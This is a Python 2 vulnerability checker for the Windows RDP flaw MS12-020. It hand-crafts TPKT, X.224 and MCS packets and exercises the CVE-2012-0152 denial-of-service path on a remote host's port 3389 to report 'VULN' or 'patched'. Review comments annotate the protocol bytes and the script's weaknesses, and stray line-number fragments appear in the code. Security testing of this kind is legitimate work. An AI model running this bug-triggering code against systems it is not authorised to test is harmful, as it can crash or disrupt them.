
MS12-020 remote checker

#!/usr/bin/env python

#
# MS12-020 checker (no BSOD)
#
# Uses the DoS bug (CVE-2012-0152) for the check
#
# Update: the RDP negotiation request was removed so that standard RDP is used, which is needed for Windows 7
#
# by Worawit Wang (sleepya)
#

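import sys
import socket
from struct import pack, unpack

# The only argument is the target host name or address; there is no option
# parsing.  Fail early with a usage line instead of an IndexError traceback
# when the argument is missing (or when extra arguments are passed by mistake).
if len(sys.argv) != 2:
    sys.stderr.write("usage: %s <host>\n" % sys.argv[0])
    sys.exit(1)
host = sys.argv[1]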
  18.  
def make_tpkt(data):
    """Frame *data* in a TPKT header (RFC 1006).

    The header is: version 3, reserved 0, then a 16-bit big-endian total
    length that counts the 4 header bytes plus *data*.  pack() raises
    struct.error if that total does not fit in 16 bits.
    """
    total_len = len(data) + 4
    header = pack("!BBH", 3, 0, total_len)
    return header + data
  21.  
def make_x224(type, data):
    """Build an X.224 TPDU: length indicator, TPDU code, payload.

    The one-byte length indicator (LI) covers the code byte and *data*,
    then comes the code itself (*type*, e.g. 0xe0 Connection Request or
    0xf0 Data TPDU as used in this script) followed by *data*.  The
    parameter name ``type`` shadows the builtin; it is kept as-is so the
    existing call sites are unaffected.
    """
    length_indicator = len(data) + 1
    tpdu_header = pack("!BB", length_indicator, type)
    return tpdu_header + data
  24.  
  25.  
# Plain TCP to the standard RDP port.  The 10 s timeout applies to every
# send()/recv() below; a server that stops answering surfaces as
# socket.timeout, which nothing in this script catches.
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(10)
sk.connect((host,3389))

# craft connection request
# x224 type 0xe0
# - dst_ref, src_ref, class_opts, data
# No RDP Negotiation Request is appended (see "Update" in the header), so the
# only accepted reply is the bare 11-byte X.224 Connection Confirm compared
# below.  Any other reply -- one carrying a negotiation response, a short
# read, or a differently configured server -- ends in "Cannot check"; it is
# never reported as "patched".
x224_1 = make_x224(0xe0, pack("!HHB", 0, 0, 0))
sk.send(make_tpkt(x224_1))
data = sk.recv(8192)
# Exact match on a Python 2 str (the print statements below fix the script to
# Python 2).  Under Python 3 recv() returns bytes, so this comparison could
# never succeed and every run would stop here.
if data != "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00":
        print "Cannot check"
        sys.exit()

# x224 type 0xf0 (Data TPDU)
# - EOT (0x80)
# Reused as the X.224 prefix of every MCS PDU sent from here on.
x224_2 = make_x224(0xf0, pack("!B", 0x80))

# craft connect-initial with gcc
# MCS DomainParameters as BER TLVs: 0x02 = INTEGER tag, then a one-byte
# length, then the value.  Three parameter sets (target, minimum, maximum)
# are wrapped in SEQUENCEs (0x30) inside mcs_data below.
target_params = (""
        + "\x02\x01\x22" # maxChannelIds
        + "\x02\x01\x20" # maxUserIds
        + "\x02\x01\x00" # maxTokenIds
        + "\x02\x01\x01" # numPriorities
        + "\x02\x01\x00" # minThroughput
        + "\x02\x01\x01" # maxHeight
        + "\x02\x02\xff\xff" # maxMCSPDUSize (two-byte INTEGER)
        + "\x02\x01\x02" # protocolVersion
)
min_params = (""
        + "\x02\x01\x01" # maxChannelIds
        + "\x02\x01\x01" # maxUserIds
        + "\x02\x01\x01" # maxTokenIds
        + "\x02\x01\x01" # numPriorities
        + "\x02\x01\x00" # minThroughput
        + "\x02\x01\x01" # maxHeight
        # NOTE(review): a one-byte BER INTEGER 0xff decodes as -1 (two's
        # complement), not 255; 255 would be "\x02\x02\x00\xff".  Same for the
        # 0xff values in max_params.  Left as-is since the exchange is
        # reported to work; worth confirming if the server ever rejects it.
        + "\x02\x01\xff" # maxMCSPDUSize
        + "\x02\x01\x02" # protocolVersion
)
max_params = (""
        + "\x02\x01\xff" # maxChannelIds
        + "\x02\x01\xff" # maxUserIds
        + "\x02\x01\xff" # maxTokenIds
        + "\x02\x01\x01" # numPriorities
        + "\x02\x01\x00" # minThroughput
        + "\x02\x01\x01" # maxHeight
        + "\x02\x02\xff\xff" # maxMCSPDUSize (two-byte INTEGER)
        + "\x02\x01\x02" # protocolVersion
)
mcs_data = (""
        + "\x04\x01\x01" # callingDomainSelector (OCTET STRING)
        + "\x04\x01\x01" # calledDomainSelector (OCTET STRING)
        + "\x01\x01\xff" # upwardFlag (BOOLEAN TRUE)
        # Each SEQUENCE length is a single byte (BER short form, valid only up
        # to 127); all three parameter sets are well under that here.
        + "\x30" + pack("B", len(target_params)) + target_params
        + "\x30" + pack("B", len(min_params)) + min_params
        + "\x30" + pack("B", len(max_params)) + max_params
        + "\x04\x00" # userData (empty OCTET STRING)
)

# \x7f\x65  BER: APPLICATION 101 = Connect-Initial (MCS_TYPE_CONNECTINITIAL)
# Single-byte length again (mcs_data is well under 128 bytes here).  Note that
# the server's reply to this Connect-Initial is never read: the next recv()
# is the one after the first attach-user request below.
mcs = "\x7f\x65" + pack("!B", len(mcs_data))
sk.send(make_tpkt(x224_2 + mcs + mcs_data))

# craft attach user request
# 0x28 = MCS AttachUserRequest.  The assigned user id is taken from bytes
# 9:11 of whatever recv() returns.  NOTE(review): because the Connect-Initial
# reply above was never consumed, this read may return that reply (alone or
# concatenated with the confirm) rather than the AttachUserConfirm by itself
# -- verify against a packet capture before relying on user1/user2.  A short
# or empty reply makes unpack() raise struct.error, which is not handled.
sk.send(make_tpkt(x224_2 + "\x28"))
data = sk.recv(8192)
user1 = unpack("!H", data[9:11])[0]

# Second attach-user request: the channel join below needs two distinct
# user ids, one as the requester and one to derive the channel id from.
sk.send(make_tpkt(x224_2 + "\x28"))
data = sk.recv(8192)
user2 = unpack("!H", data[9:11])[0]

# craft channel join request
# 0x38 = MCS ChannelJoinRequest from user1 for channel id user2+1001, i.e. a
# channel derived from the *other* attached user.  This is the CVE-2012-0152
# condition the header refers to ("Use DoS bug ... for check"): the script
# exercises the vulnerable code path itself instead of inferring patch level
# from version data, and its "no BSOD" claim rests on the safety step in the
# branch below.  A reply whose bytes 7:9 are "\x3e\x00" is the author's
# "vulnerable" signature.  A socket.timeout at this recv() (server gone
# quiet) is not classified at all -- the script dies with a traceback.
sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user1, user2+1001)))
data = sk.recv(8192)
if data[7:9] == "\x3e\x00":
        print "!!! VULN !!!"
        # below for safety from BSOD
        # Best-effort: join the same channel from user2 itself, presumably so
        # the server's channel bookkeeping ends in a consistent state (the
        # page gives no further rationale).  The reply is read but never
        # inspected, so nothing confirms that this step actually succeeded.
        sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user2, user2+1001)))
        data = sk.recv(8192)
else:
        # Reached for *any* reply without the signature above, including
        # malformed or unrelated PDUs, so "patched" also covers "unexpected
        # reply".  Treat it as "signature not seen", not as proof of a patch.
        print "patched"

# Not reached if any recv() above raises (no try/finally); the socket is
# then closed only when the interpreter exits.
sk.close()